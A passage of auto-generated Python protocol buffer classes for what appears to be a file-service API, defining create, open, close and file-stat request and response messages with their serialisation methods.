tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CreateRequest_Parameter'
class CreateRequest(ProtocolBuffer.ProtocolMessage):
has_filesystem_ = 0
filesystem_ = ""
has_content_type_ = 0
content_type_ = 0
has_filename_ = 0
filename_ = ""
has_expiration_time_seconds_ = 0
expiration_time_seconds_ = 0
def __init__(self, contents=None):
self.parameters_ = []
if contents is not None: self.MergeFromString(contents)
def filesystem(self): return self.filesystem_
def set_filesystem(self, x):
self.has_filesystem_ = 1
self.filesystem_ = x
def clear_filesystem(self):
if self.has_filesystem_:
self.has_filesystem_ = 0
self.filesystem_ = ""
def has_filesystem(self): return self.has_filesystem_
def content_type(self): return self.content_type_
def set_content_type(self, x):
self.has_content_type_ = 1
self.content_type_ = x
def clear_content_type(self):
if self.has_content_type_:
self.has_content_type_ = 0
self.content_type_ = 0
def has_content_type(self): return self.has_content_type_
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def parameters_size(self): return len(self.parameters_)
def parameters_list(self): return self.parameters_
def parameters(self, i):
return self.parameters_[i]
def mutable_parameters(self, i):
return self.parameters_[i]
def add_parameters(self):
x = CreateRequest_Parameter()
self.parameters_.append(x)
return x
def clear_parameters(self):
self.parameters_ = []
def expiration_time_seconds(self): return self.expiration_time_seconds_
def set_expiration_time_seconds(self, x):
self.has_expiration_time_seconds_ = 1
self.expiration_time_seconds_ = x
def clear_expiration_time_seconds(self):
if self.has_expiration_time_seconds_:
self.has_expiration_time_seconds_ = 0
self.expiration_time_seconds_ = 0
def has_expiration_time_seconds(self): return self.has_expiration_time_seconds_
def MergeFrom(self, x):
assert x is not self
if (x.has_filesystem()): self.set_filesystem(x.filesystem())
if (x.has_content_type()): self.set_content_type(x.content_type())
if (x.has_filename()): self.set_filename(x.filename())
for i in xrange(x.parameters_size()): self.add_parameters().CopyFrom(x.parameters(i))
if (x.has_expiration_time_seconds()): self.set_expiration_time_seconds(x.expiration_time_seconds())
def Equals(self, x):
if x is self: return 1
if self.has_filesystem_ != x.has_filesystem_: return 0
if self.has_filesystem_ and self.filesystem_ != x.filesystem_: return 0
if self.has_content_type_ != x.has_content_type_: return 0
if self.has_content_type_ and self.content_type_ != x.content_type_: return 0
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if len(self.parameters_) != len(x.parameters_): return 0
for e1, e2 in zip(self.parameters_, x.parameters_):
if e1 != e2: return 0
if self.has_expiration_time_seconds_ != x.has_expiration_time_seconds_: return 0
if self.has_expiration_time_seconds_ and self.expiration_time_seconds_ != x.expiration_time_seconds_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filesystem_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filesystem not set.')
if (not self.has_content_type_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: content_type not set.')
for p in self.parameters_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filesystem_))
n += self.lengthVarInt64(self.content_type_)
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
n += 1 * len(self.parameters_)
for i in xrange(len(self.parameters_)): n += self.lengthString(self.parameters_[i].ByteSize())
if (self.has_expiration_time_seconds_): n += 1 + self.lengthVarInt64(self.expiration_time_seconds_)
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_filesystem_):
n += 1
n += self.lengthString(len(self.filesystem_))
if (self.has_content_type_):
n += 1
n += self.lengthVarInt64(self.content_type_)
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
n += 1 * len(self.parameters_)
for i in xrange(len(self.parameters_)): n += self.lengthString(self.parameters_[i].ByteSizePartial())
if (self.has_expiration_time_seconds_): n += 1 + self.lengthVarInt64(self.expiration_time_seconds_)
return n
def Clear(self):
self.clear_filesystem()
self.clear_content_type()
self.clear_filename()
self.clear_parameters()
self.clear_expiration_time_seconds()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_)
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_filename_):
out.putVarInt32(26)
out.putPrefixedString(self.filename_)
for i in xrange(len(self.parameters_)):
out.putVarInt32(34)
out.putVarInt32(self.parameters_[i].ByteSize())
self.parameters_[i].OutputUnchecked(out)
if (self.has_expiration_time_seconds_):
out.putVarInt32(40)
out.putVarInt64(self.expiration_time_seconds_)
def OutputPartial(self, out):
if (self.has_filesystem_):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_)
if (self.has_content_type_):
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_filename_):
out.putVarInt32(26)
out.putPrefixedString(self.filename_)
for i in xrange(len(self.parameters_)):
out.putVarInt32(34)
out.putVarInt32(self.parameters_[i].ByteSizePartial())
self.parameters_[i].OutputPartial(out)
if (self.has_expiration_time_seconds_):
out.putVarInt32(40)
out.putVarInt64(self.expiration_time_seconds_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filesystem(d.getPrefixedString())
continue
if tt == 16:
self.set_content_type(d.getVarInt32())
continue
if tt == 26:
self.set_filename(d.getPrefixedString())
continue
if tt == 34:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_parameters().TryMerge(tmp)
continue
if tt == 40:
self.set_expiration_time_seconds(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filesystem_: res+=prefix+("filesystem: %s\n" % self.DebugFormatString(self.filesystem_))
if self.has_content_type_: res+=prefix+("content_type: %s\n" % self.DebugFormatInt32(self.content_type_))
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
cnt=0
for e in self.parameters_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("parameters%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_expiration_time_seconds_: res+=prefix+("expiration_time_seconds: %s\n" % self.DebugFormatInt64(self.expiration_time_seconds_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilesystem = 1
kcontent_type = 2
kfilename = 3
kparameters = 4
kexpiration_time_seconds = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filesystem",
2: "content_type",
3: "filename",
4: "parameters",
5: "expiration_time_seconds",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.NUMERIC,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CreateRequest'
class CreateResponse(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
return n
def Clear(self):
self.clear_filename()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CreateResponse'
class OpenRequest(ProtocolBuffer.ProtocolMessage):
APPEND = 1
READ = 2
_OpenMode_NAMES = {
1: "APPEND",
2: "READ",
}
def OpenMode_Name(cls, x): return cls._OpenMode_NAMES.get(x, "")
OpenMode_Name = classmethod(OpenMode_Name)
has_filename_ = 0
filename_ = ""
has_content_type_ = 0
content_type_ = 0
has_open_mode_ = 0
open_mode_ = 0
has_exclusive_lock_ = 0
exclusive_lock_ = 0
has_buffered_output_ = 0
buffered_output_ = 0
has_open_lease_time_seconds_ = 0
open_lease_time_seconds_ = 30
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def content_type(self): return self.content_type_
def set_content_type(self, x):
self.has_content_type_ = 1
self.content_type_ = x
def clear_content_type(self):
if self.has_content_type_:
self.has_content_type_ = 0
self.content_type_ = 0
def has_content_type(self): return self.has_content_type_
def open_mode(self): return self.open_mode_
def set_open_mode(self, x):
self.has_open_mode_ = 1
self.open_mode_ = x
def clear_open_mode(self):
if self.has_open_mode_:
self.has_open_mode_ = 0
self.open_mode_ = 0
def has_open_mode(self): return self.has_open_mode_
def exclusive_lock(self): return self.exclusive_lock_
def set_exclusive_lock(self, x):
self.has_exclusive_lock_ = 1
self.exclusive_lock_ = x
def clear_exclusive_lock(self):
if self.has_exclusive_lock_:
self.has_exclusive_lock_ = 0
self.exclusive_lock_ = 0
def has_exclusive_lock(self): return self.has_exclusive_lock_
def buffered_output(self): return self.buffered_output_
def set_buffered_output(self, x):
self.has_buffered_output_ = 1
self.buffered_output_ = x
def clear_buffered_output(self):
if self.has_buffered_output_:
self.has_buffered_output_ = 0
self.buffered_output_ = 0
def has_buffered_output(self): return self.has_buffered_output_
def open_lease_time_seconds(self): return self.open_lease_time_seconds_
def set_open_lease_time_seconds(self, x):
self.has_open_lease_time_seconds_ = 1
self.open_lease_time_seconds_ = x
def clear_open_lease_time_seconds(self):
if self.has_open_lease_time_seconds_:
self.has_open_lease_time_seconds_ = 0
self.open_lease_time_seconds_ = 30
def has_open_lease_time_seconds(self): return self.has_open_lease_time_seconds_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_content_type()): self.set_content_type(x.content_type())
if (x.has_open_mode()): self.set_open_mode(x.open_mode())
if (x.has_exclusive_lock()): self.set_exclusive_lock(x.exclusive_lock())
if (x.has_buffered_output()): self.set_buffered_output(x.buffered_output())
if (x.has_open_lease_time_seconds()): self.set_open_lease_time_seconds(x.open_lease_time_seconds())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_content_type_ != x.has_content_type_: return 0
if self.has_content_type_ and self.content_type_ != x.content_type_: return 0
if self.has_open_mode_ != x.has_open_mode_: return 0
if self.has_open_mode_ and self.open_mode_ != x.open_mode_: return 0
if self.has_exclusive_lock_ != x.has_exclusive_lock_: return 0
if self.has_exclusive_lock_ and self.exclusive_lock_ != x.exclusive_lock_: return 0
if self.has_buffered_output_ != x.has_buffered_output_: return 0
if self.has_buffered_output_ and self.buffered_output_ != x.buffered_output_: return 0
if self.has_open_lease_time_seconds_ != x.has_open_lease_time_seconds_: return 0
if self.has_open_lease_time_seconds_ and self.open_lease_time_seconds_ != x.open_lease_time_seconds_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_content_type_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: content_type not set.')
if (not self.has_open_mode_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: open_mode not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthVarInt64(self.content_type_)
n += self.lengthVarInt64(self.open_mode_)
if (self.has_exclusive_lock_): n += 2
if (self.has_buffered_output_): n += 2
if (self.has_open_lease_time_seconds_): n += 1 + self.lengthVarInt64(self.open_lease_time_seconds_)
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_content_type_):
n += 1
n += self.lengthVarInt64(self.content_type_)
if (self.has_open_mode_):
n += 1
n += self.lengthVarInt64(self.open_mode_)
if (self.has_exclusive_lock_): n += 2
if (self.has_buffered_output_): n += 2
if (self.has_open_lease_time_seconds_): n += 1 + self.lengthVarInt64(self.open_lease_time_seconds_)
return n
def Clear(self):
self.clear_filename()
self.clear_content_type()
self.clear_open_mode()
self.clear_exclusive_lock()
self.clear_buffered_output()
self.clear_open_lease_time_seconds()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
out.putVarInt32(24)
out.putVarInt32(self.open_mode_)
if (self.has_exclusive_lock_):
out.putVarInt32(32)
out.putBoolean(self.exclusive_lock_)
if (self.has_buffered_output_):
out.putVarInt32(40)
out.putBoolean(self.buffered_output_)
if (self.has_open_lease_time_seconds_):
out.putVarInt32(48)
out.putVarInt32(self.open_lease_time_seconds_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_content_type_):
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_open_mode_):
out.putVarInt32(24)
out.putVarInt32(self.open_mode_)
if (self.has_exclusive_lock_):
out.putVarInt32(32)
out.putBoolean(self.exclusive_lock_)
if (self.has_buffered_output_):
out.putVarInt32(40)
out.putBoolean(self.buffered_output_)
if (self.has_open_lease_time_seconds_):
out.putVarInt32(48)
out.putVarInt32(self.open_lease_time_seconds_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_content_type(d.getVarInt32())
continue
if tt == 24:
self.set_open_mode(d.getVarInt32())
continue
if tt == 32:
self.set_exclusive_lock(d.getBoolean())
continue
if tt == 40:
self.set_buffered_output(d.getBoolean())
continue
if tt == 48:
self.set_open_lease_time_seconds(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_content_type_: res+=prefix+("content_type: %s\n" % self.DebugFormatInt32(self.content_type_))
if self.has_open_mode_: res+=prefix+("open_mode: %s\n" % self.DebugFormatInt32(self.open_mode_))
if self.has_exclusive_lock_: res+=prefix+("exclusive_lock: %s\n" % self.DebugFormatBool(self.exclusive_lock_))
if self.has_buffered_output_: res+=prefix+("buffered_output: %s\n" % self.DebugFormatBool(self.buffered_output_))
if self.has_open_lease_time_seconds_: res+=prefix+("open_lease_time_seconds: %s\n" % self.DebugFormatInt32(self.open_lease_time_seconds_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kcontent_type = 2
kopen_mode = 3
kexclusive_lock = 4
kbuffered_output = 5
kopen_lease_time_seconds = 6
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "content_type",
3: "open_mode",
4: "exclusive_lock",
5: "buffered_output",
6: "open_lease_time_seconds",
}, 6)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
}, 6, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.OpenRequest'
class OpenResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.OpenResponse'
class CloseRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_finalize_ = 0
finalize_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def finalize(self): return self.finalize_
def set_finalize(self, x):
self.has_finalize_ = 1
self.finalize_ = x
def clear_finalize(self):
if self.has_finalize_:
self.has_finalize_ = 0
self.finalize_ = 0
def has_finalize(self): return self.has_finalize_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_finalize()): self.set_finalize(x.finalize())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_finalize_ != x.has_finalize_: return 0
if self.has_finalize_ and self.finalize_ != x.finalize_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
if (self.has_finalize_): n += 2
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_finalize_): n += 2
return n
def Clear(self):
self.clear_filename()
self.clear_finalize()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_finalize_):
out.putVarInt32(16)
out.putBoolean(self.finalize_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_finalize_):
out.putVarInt32(16)
out.putBoolean(self.finalize_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_finalize(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_finalize_: res+=prefix+("finalize: %s\n" % self.DebugFormatBool(self.finalize_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kfinalize = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "finalize",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CloseRequest'
class CloseResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CloseResponse'
class FileStat(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_content_type_ = 0
content_type_ = 0
has_finalized_ = 0
finalized_ = 0
has_length_ = 0
length_ = 0
has_ctime_ = 0
ctime_ = 0
has_mtime_ = 0
mtime_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def content_type(self): return self.content_type_
def set_content_type(self, x):
self.has_content_type_ = 1
self.content_type_ = x
def clear_content_type(self):
if self.has_content_type_:
self.has_content_type_ = 0
self.content_type_ = 0
def has_content_type(self): return self.has_content_type_
def finalized(self): return self.finalized_
def set_finalized(self, x):
self.has_finalized_ = 1
self.finalized_ = x
def clear_finalized(self):
if self.has_finalized_:
self.has_finalized_ = 0
self.finalized_ = 0
def has_finalized(self): return self.has_finalized_
def length(self): return self.length_
def set_length(self, x):
self.has_length_ = 1
self.length_ = x
def clear_length(self):
if self.has_length_:
self.has_length_ = 0
self.length_ = 0
def has_length(self): return self.has_length_
def ctime(self): return self.ctime_
def set_ctime(self, x):
self.has_ctime_ = 1
self.ctime_ = x
def clear_ctime(self):
if self.has_ctime_:
self.has_ctime_ = 0
self.ctime_ = 0
def has_ctime(self): return self.has_ctime_
def mtime(self): return self.mtime_
def set_mtime(self, x):
self.has_mtime_ = 1
self.mtime_ = x
def clear_mtime(self):
if self.has_mtime_:
self.has_mtime_ = 0
self.mtime_ = 0
def has_mtime(self): return self.has_mtime_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_content_type()): self.set_content_type(x.content_type())
if (x.has_finalized()): self.set_finalized(x.finalized())
if (x.has_length()): self.set_length(x.length())
if (x.has_ctime()): self.set_ctime(x.ctime())
if (x.has_mtime()): self.set_mtime(x.mtime())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_content_type_ != x.has_content_type_: return 0
if self.has_content_type_ and self.content_type_ != x.content_type_: return 0
if self.has_finalized_ != x.has_finalized_: return 0
if self.has_finalized_ and self.finalized_ != x.finalized_: return 0
if self.has_length_ != x.has_length_: return 0
if self.has_length_ and self.length_ != x.length_: return 0
if self.has_ctime_ != x.has_ctime_: return 0
if self.has_ctime_ and self.ctime_ != x.ctime_: return 0
if self.has_mtime_ != x.has_mtime_: return 0
if self.has_mtime_ and self.mtime_ != x.mtime_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_content_type_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: content_type not set.')
if (not self.has_finalized_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: finalized not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthVarInt64(self.content_type_)
if (self.has_length_): n += 1 + self.lengthVarInt64(self.length_)
if (self.has_ctime_): n += 1 + self.lengthVarInt64(self.ctime_)
if (self.has_mtime_): n += 1 + self.lengthVarInt64(self.mtime_)
return n + 4
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_content_type_):
n += 1
n += self.lengthVarInt64(self.content_type_)
if (self.has_finalized_):
n += 2
if (self.has_length_): n += 1 + self.lengthVarInt64(self.length_)
if (self.has_ctime_): n += 1 + self.lengthVarInt64(self.ctime_)
if (self.has_mtime_): n += 1 + self.lengthVarInt64(self.mtime_)
return n
def Clear(self):
self.clear_filename()
self.clear_content_type()
self.clear_finalized()
self.clear_length()
self.clear_ctime()
self.clear_mtime()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
out.putVarInt32(24)
out.putBoolean(self.finalized_)
if (self.has_length_):
out.putVarInt32(32)
out.putVarInt64(self.length_)
if (self.has_ctime_):
out.putVarInt32(40)
out.putVarInt64(self.ctime_)
if (self.has_mtime_):
out.putVarInt32(48)
out.putVarInt64(self.mtime_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_content_type_):
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_finalized_):
out.putVarInt32(24)
out.putBoolean(self.finalized_)
if (self.has_length_):
out.putVarInt32(32)
out.putVarInt64(self.length_)
if (self.has_ctime_):
out.putVarInt32(40)
out.putVarInt64(self.ctime_)
if (self.has_mtime_):
out.putVarInt32(48)
out.putVarInt64(self.mtime_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_content_type(d.getVarInt32())
continue
if tt == 24:
self.set_finalized(d.getBoolean())
continue
if tt == 32:
self.set_length(d.getVarInt64())
continue
if tt == 40:
self.set_ctime(d.getVarInt64())
continue
if tt == 48:
self.set_mtime(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_content_type_: res+=prefix+("content_type: %s\n" % self.DebugFormatInt32(self.content_type_))
if self.has_finalized_: res+=prefix+("finalized: %s\n" % self.DebugFormatBool(self.finalized_))
if self.has_length_: res+=prefix+("length: %s\n" % self.DebugFormatInt64(self.length_))
if self.has_ctime_: res+=prefix+("ctime: %s\n" % self.DebugFormatInt64(self.ctime_))
if self.has_mtime_: res+=prefix+("mtime: %s\n" % self.DebugFormatInt64(self.mtime_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kcontent_type = 2
